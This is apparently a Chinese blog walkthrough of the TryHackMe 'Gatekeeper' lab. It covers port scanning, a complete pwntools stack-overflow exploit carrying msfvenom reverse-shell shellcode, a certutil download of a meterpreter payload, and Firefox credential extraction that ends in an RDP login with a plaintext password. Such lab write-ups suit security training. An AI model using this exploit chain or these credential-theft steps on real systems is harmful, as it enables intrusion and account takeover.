tryhackme-Gatekeeper(守门人)

信息收集

首先使用nmap进行端口扫描,结果如下

nmap -sT -p- --min-rate 10000 -oA openPort
nmap -sV -O -A -p port1,port2,portN -oA version
nmap --script=smb..  -p 135,139,445 -oA 445Port
# Nmap 7.94SVN scan initiated Sat Jul 13 23:05:09 2024 as: nmap -sT -p- --min-rate 10000 -oA openPort 10.10.130.100
Warning: 10.10.130.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.130.100
Host is up (0.24s latency).
Not shown: 65262 closed tcp ports (conn-refused), 262 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown
49164/tcp open  unknown

# Nmap done at Sat Jul 13 23:05:39 2024 -- 1 IP address (1 host up) scanned in 30.48 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:07:13 2024 as: nmap -sV -O -A --min-rate 10000 -oA version -p 135,139,445,3389,31337,49152-49155,49163-49164 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
|_ssl-date: 2024-07-14T03:10:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2024-07-13T03:05:08
|_Not valid after:  2025-01-12T03:05:08
| rdp-ntlm-info: 
|   Target_Name: GATEKEEPER
|   NetBIOS_Domain_Name: GATEKEEPER
|   NetBIOS_Computer_Name: GATEKEEPER
|   DNS_Domain_Name: gatekeeper
|   DNS_Computer_Name: gatekeeper
|   Product_Version: 6.1.7601
|_  System_Time: 2024-07-14T03:10:08+00:00
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49163/tcp open  msrpc          Microsoft Windows RPC
49164/tcp open  msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94SVN%I=7%D=7/13%Time=669340EF%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n"
SF:)%r(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\
SF:x20Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:n
SF:m@nm>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-
SF:ID:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-F
SF:orwards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Conta
SF:ct:\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHell
SF:o\x20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(
SF:HTTPOptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!
SF:\n")%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x
SF:20\r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x
SF:20\x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSS
SF:essionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(
SF:FourOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2
SF:ebak\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x0
SF:1default!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!
SF:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d8:aa:d3:b1:8d (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-13T23:10:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 48m00s, deviation: 1h47m20s, median: 0s
| smb2-time: 
|   date: 2024-07-14T03:10:07
|_  start_date: 2024-07-14T03:05:02

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   249.25 ms 10.9.0.1
2   249.34 ms 10.10.130.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 13 23:10:14 2024 -- 1 IP address (1 host up) scanned in 181.09 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:10:30 2024 as: nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p135,139,445 -oA /home/kali/Gatekeeper/445Port 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.100\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.130.100\Users: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ

# Nmap done at Sat Jul 13 23:11:22 2024 -- 1 IP address (1 host up) scanned in 52.26 seconds

通过扫描结果发现开放对我们有用的端口有445 3389 31337
首先上述的扫描结果中445端口有一个Users目录拥有读取权限,连接发现程序gatekeeper.exe,将其下载

在本地虚拟机中运行

进入了监听状态,应该是开放了一个端口,根据扫描的结果31337,猜测该程序可能就会开启31337端口,使用netstat -an -p tcp查看

使用nc连接查看

该程序可能存在栈溢出漏洞,访问靶机的31337端口是否和该程序一样

可以看到是一样的程序

接下来的思路就是使用debug工具对该程序进行栈溢出漏洞调试并利用,和之前学习的步骤类似,这里就不在详细讲解

漏洞调试

我自己使用pwntools写了一个fuzz简易脚本

import time
from pwn import *
# context(log_level="debug")


padding = b"A" * 50
while True:
	try:
		p = remote("192.168.226.132",31337)

		p.sendline(padding)
		print(f"send {len(padding)} bytes Test!")
		p.recv()
	except:
		print(f"at {len(padding)} bytes error")
	padding += b"A" * 50
	time.sleep(1)

该程序每次回多增加50个字符到缓冲区,将程序使用debug程序运行

运行脚本


脚本在150个字符卡住了,接着测试在那个字符造成溢出,我自己写了一个脚本,如下

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b""

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

使用msf-pattern_create生成150个字符,填充到payload += b""变量中

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

接着重启程序,运行脚本

EIP复制使用msf-pattern_offset查找字符偏移


缓冲区的大小为146,将该值替换到offset变量中

offset = 146

接着将脚本中之前的垃圾字符删除,加上一条payload += b"BBBB"代码

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

重启程序,再次运行脚本,这次EIP为漏洞验证,EIP的值应该被覆盖为了42424242


成功了
接着生成除了\x00的所有坏字符,测试坏字符

!mona bytearray -b "\x00"


将坏字符加入脚本中

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"
payload += (
	b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
	b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
	b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
	b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
	b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
	b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
	b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
	b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

重启程序,再次运行脚本


复制ESP运行mona插件查找坏字符

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 009E19E4


坏字符为\x00\x0a,接着查找jmp esp

!mona jmp -r esp -cpb "\x00\x0a"


将地址使用小端排序存储填充到BBBB

payload += b"\xc3\x14\x04\x08"	# 0x080414c3 

接着生成shellcode,往下继续拼接payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.226.131 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c

为了shellcode正常执行,需要填充一些nop,\x90,最终的脚本如下

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"\xc3\x14\x04\x08"	# 0x080414c3 
payload += b"\x90" * 16
payload += (
	b"\xdb\xc2\xba\xdb\x7f\xc7\xbd\xd9\x74\x24\xf4\x5b\x31\xc9"
	b"\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x88\x6c\x25\x48\xd2"
	b"\x7b\x2b\xb3\x2a\x7c\x4c\x3d\xcf\x4d\x4c\x59\x84\xfe\x7c"
	b"\x29\xc8\xf2\xf7\x7f\xf8\x81\x7a\xa8\x0f\x21\x30\x8e\x3e"
	b"\xb2\x69\xf2\x21\x30\x70\x27\x81\x09\xbb\x3a\xc0\x4e\xa6"
	b"\xb7\x90\x07\xac\x6a\x04\x23\xf8\xb6\xaf\x7f\xec\xbe\x4c"
	b"\x37\x0f\xee\xc3\x43\x56\x30\xe2\x80\xe2\x79\xfc\xc5\xcf"
	b"\x30\x77\x3d\xbb\xc2\x51\x0f\x44\x68\x9c\xbf\xb7\x70\xd9"
	b"\x78\x28\x07\x13\x7b\xd5\x10\xe0\x01\x01\x94\xf2\xa2\xc2"
	b"\x0e\xde\x53\x06\xc8\x95\x58\xe3\x9e\xf1\x7c\xf2\x73\x8a"
	b"\x79\x7f\x72\x5c\x08\x3b\x51\x78\x50\x9f\xf8\xd9\x3c\x4e"
	b"\x04\x39\x9f\x2f\xa0\x32\x32\x3b\xd9\x19\x5b\x88\xd0\xa1"
	b"\x9b\x86\x63\xd2\xa9\x09\xd8\x7c\x82\xc2\xc6\x7b\xe5\xf8"
	b"\xbf\x13\x18\x03\xc0\x3a\xdf\x57\x90\x54\xf6\xd7\x7b\xa4"
	b"\xf7\x0d\x2b\xf4\x57\xfe\x8c\xa4\x17\xae\x64\xae\x97\x91"
	b"\x95\xd1\x7d\xba\x3c\x28\x16\x05\x68\xd0\x65\xed\x6b\x14"
	b"\x7b\xb2\xe2\xf2\x11\x5a\xa3\xad\x8d\xc3\xee\x25\x2f\x0b"
	b"\x25\x40\x6f\x87\xca\xb5\x3e\x60\xa6\xa5\xd7\x80\xfd\x97"
	b"\x7e\x9e\x2b\xbf\x1d\x0d\xb0\x3f\x6b\x2e\x6f\x68\x3c\x80"
	b"\x66\xfc\xd0\xbb\xd0\xe2\x28\x5d\x1a\xa6\xf6\x9e\xa5\x27"
	b"\x7a\x9a\x81\x37\x42\x23\x8e\x63\x1a\x72\x58\xdd\xdc\x2c"
	b"\x2a\xb7\xb6\x83\xe4\x5f\x4e\xe8\x36\x19\x4f\x25\xc1\xc5"
	b"\xfe\x90\x94\xfa\xcf\x74\x11\x83\x2d\xe5\xde\x5e\xf6\x05"
	b"\x3d\x4a\x03\xae\x98\x1f\xae\xb3\x1a\xca\xed\xcd\x98\xfe"
	b"\x8d\x29\x80\x8b\x88\x76\x06\x60\xe1\xe7\xe3\x86\x56\x07"
	b"\x26"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

重启程序,监听4444,运行脚本获得反弹shell

获取FLAG

同样的步骤只需要修改IP运行即可获取靶机的反弹shell

获取user.txt

权限提升

虽然没有成功记录一下我的思路,首先在生成反弹shell代码的时候可以直接反弹meterpreter,但是这里我生成的反弹的是普通的shell,我需要提升为meterpreter的终端
于是我生成了一个shell.exe,然后使用python -m http.server 80共享,靶机使用certutil -split -f -urlcache下载,于是我得到一个meterpreter终端

接着我尝试使用post/multi/recon/local_exploit_suggester来查找可能存在的提权

我在尝试最后一个的时候并没有获取shell,不知道为什么

然后使用winPEAS没有回显,手动收集没有得到实际用途的信息,于是就没有了头绪,参考博客发现是firefox中保存的凭据
使用firefox_creds保存凭据


我更改了名称

接着需要使用github上的一个脚本解析这些凭据,地址: https://github.com/unode/firefox_decrypt/blob/main/firefox_decrypt.py
运行后得到mayor用户的凭据

python firefox_decrypt.py ./firefox

./firefox文件夹中保存着导出的所有凭据

接着使用xfreerdp连接到靶机

xfreerdp /u:mayor /p:8CL7O1N78MdrCIsV /sec:rdp /v:10.10.163.211 +clipboard

得到root.txt

实验结束。

posted @   Junglezt  阅读(87)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示